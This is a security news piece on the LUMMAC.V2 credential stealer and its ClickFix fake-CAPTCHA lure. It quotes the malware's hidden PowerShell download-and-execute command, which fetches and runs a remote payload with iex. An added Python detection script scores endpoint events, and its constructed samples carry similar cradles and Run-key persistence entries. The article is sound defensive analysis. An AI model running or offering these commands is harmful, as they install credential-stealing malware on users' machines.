Cybersecurity experts have identified a sophisticated evolution of the LUMMAC credential stealer, now rewritten from C to C++ and operating with enhanced capabilities.
This new variant, designated LUMMAC.V2, has been observed targeting a wide range of applications including browsers, cryptocurrency wallets, password managers, remote desktop applications, email clients, and instant messaging platforms.
The malware's primary function is to exfiltrate sensitive information such as credentials, logins, emails, personal details, system information, screenshots, and cookies, subsequently compressing this data into a ZIP archive for transmission over HTTP connections.
What makes LUMMAC.V2 particularly dangerous is its distribution method, which relies heavily on social engineering rather than technical exploits.
The malware propagates through malicious links embedded in search results, especially those related to cracked software, popular movies, or music releases.
When users click these links, they're redirected to deceptive websites that present as security verification pages with fake CAPTCHA challenges.
Google Cloud Security Community researchers have identified that the ClickFix technique forms the cornerstone of LUMMAC.V2's attack methodology.
This technique tricks users into executing commands without realizing they're initiating malware installation.
The analysis reveals multiple delivery variations, though all begin with the same social engineering approach.
Malware Lifecycle
The ClickFix technique operates by instructing users to perform seemingly innocuous actions that trigger malware execution.
When victims land on the fake CAPTCHA page, they're guided to press Windows+R to open the Run dialog box, then instructed to press CTRL+V to paste a command that has been surreptitiously copied to their clipboard, and finally to press Enter to execute it.
The lifecycle shows an example of this deceptive page in action, while the below image reveals the underlying website's source code designed to execute this attack.
Behind the scenes, a PowerShell command executes with the '-W Hidden' parameter to prevent any console window from appearing. A typical command looks like:

    PowerShell.exe -W Hidden -command $url = 'https://finalstepgo[.]com/uploads/pnk3.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text

This command downloads and executes additional malicious payloads, establishing persistence by creating registry entries under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
This ensures the malware executes automatically at each system startup, maintaining its presence on infected systems.
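The chain described above (Run dialog, hidden PowerShell window, Invoke-WebRequest download, iex of the fetched text, HKCU Run key for persistence) leaves a recognisable shape in endpoint telemetry. The following detection logic is an added example written for this article, not code from the original report or from Google Cloud Security. The log records it scores are constructed to resemble process-creation and registry-set events; the field names (parent image, command line, target key, value data) and the sample URLs are assumptions, not a vendor schema or real indicators.

```python
"""Score process-creation and registry-set events for the ClickFix chain.

Added example for this article. The records below are constructed and the
field layout is an assumption (roughly Sysmon event 1 / event 13 fields);
the URLs are placeholders, not indicators from the report.
"""
import re

# One pattern per behaviour the article attributes to the ClickFix command.
INDICATORS = {
    # "-W Hidden" is shorthand for -WindowStyle Hidden: no console window.
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    # Download cradle: Invoke-WebRequest (or its iwr alias) fetching a URL.
    "download_cradle": re.compile(r"\b(?:invoke-webrequest|iwr)\b", re.I),
    # In-memory execution of whatever text was downloaded.
    "inline_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    # Any remote URL in the command line.
    "remote_url": re.compile(r"https?://", re.I),
}

POWERSHELL = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
# Per-user Run key named in the article (assumed already normalised to HKCU\...).
RUN_KEY = re.compile(r"^HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)


def match_indicators(text: str) -> set:
    """Return the names of every indicator present in the text."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def triage_process(parent_image: str, command_line: str) -> dict:
    """Score a process-creation event.

    The Run dialog (Windows+R) launches its target as a child of explorer.exe,
    so PowerShell spawned by explorer.exe with a hidden window and a
    download-then-execute command line matches the ClickFix pattern.
    """
    hits = match_indicators(command_line) if POWERSHELL.search(command_line) else set()
    if parent_image.lower().endswith("\\explorer.exe"):
        hits.add("parent_explorer")
    # Require the hidden window plus a fetch or in-memory exec indicator, so an
    # interactive admin session that merely downloads a file does not fire.
    suspicious = "hidden_window" in hits and bool(hits & {"download_cradle", "inline_exec"})
    return {"suspicious": suspicious, "indicators": sorted(hits)}


def triage_registry(target_key: str, value_data: str) -> dict:
    """Score a registry value write: flag HKCU Run entries that launch
    PowerShell with the same hidden-window / download / exec indicators."""
    in_run_key = bool(RUN_KEY.search(target_key))
    hits = match_indicators(value_data) if in_run_key and POWERSHELL.search(value_data) else set()
    suspicious = in_run_key and bool(hits & {"hidden_window", "download_cradle", "inline_exec"})
    return {"suspicious": suspicious, "indicators": sorted(hits)}


# Constructed telemetry: one ClickFix-style chain among ordinary activity.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": r"C:\Windows\explorer.exe",
     "cmd": "PowerShell.exe -W Hidden -command $url = 'https://example.invalid/stage.txt'; "
            "$response = Invoke-WebRequest -Uri $url -UseBasicParsing; iex $response.Content"},
    {"id": 2, "type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    {"id": 3, "type": "process", "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe Invoke-WebRequest -Uri https://intranet.example/report.csv -OutFile report.csv"},
    {"id": 4, "type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": 'powershell.exe -W Hidden -c "iex (Invoke-WebRequest https://example.invalid/s.txt).Content"'},
    {"id": 5, "type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]


def flagged_event_ids(events=SAMPLE_EVENTS) -> list:
    """Return the ids of events the two triage functions mark suspicious."""
    flagged = []
    for ev in events:
        if ev["type"] == "process":
            verdict = triage_process(ev["parent"], ev["cmd"])
        else:
            verdict = triage_registry(ev["key"], ev["data"])
        if verdict["suspicious"]:
            flagged.append(ev["id"])
    return flagged


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        v = triage_process(ev["parent"], ev["cmd"]) if ev["type"] == "process" \
            else triage_registry(ev["key"], ev["data"])
        print(ev["id"], "SUSPICIOUS" if v["suspicious"] else "ok", v["indicators"])
```

Event 3 shows why the rule requires the hidden-window flag: a user-launched Invoke-WebRequest from explorer.exe is common enough that fetching alone should not page anyone, whereas the hidden window combined with a download cradle or iex has little legitimate use in an interactive session. In production the same indicator set would be applied to the full command line captured by Sysmon or EDR rather than to these constructed records.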
The LUMMAC.V2 campaign represents a significant threat not only due to its extensive data theft capabilities but also because it exploits human behavior rather than technical vulnerabilities, making traditional security measures less effective at prevention.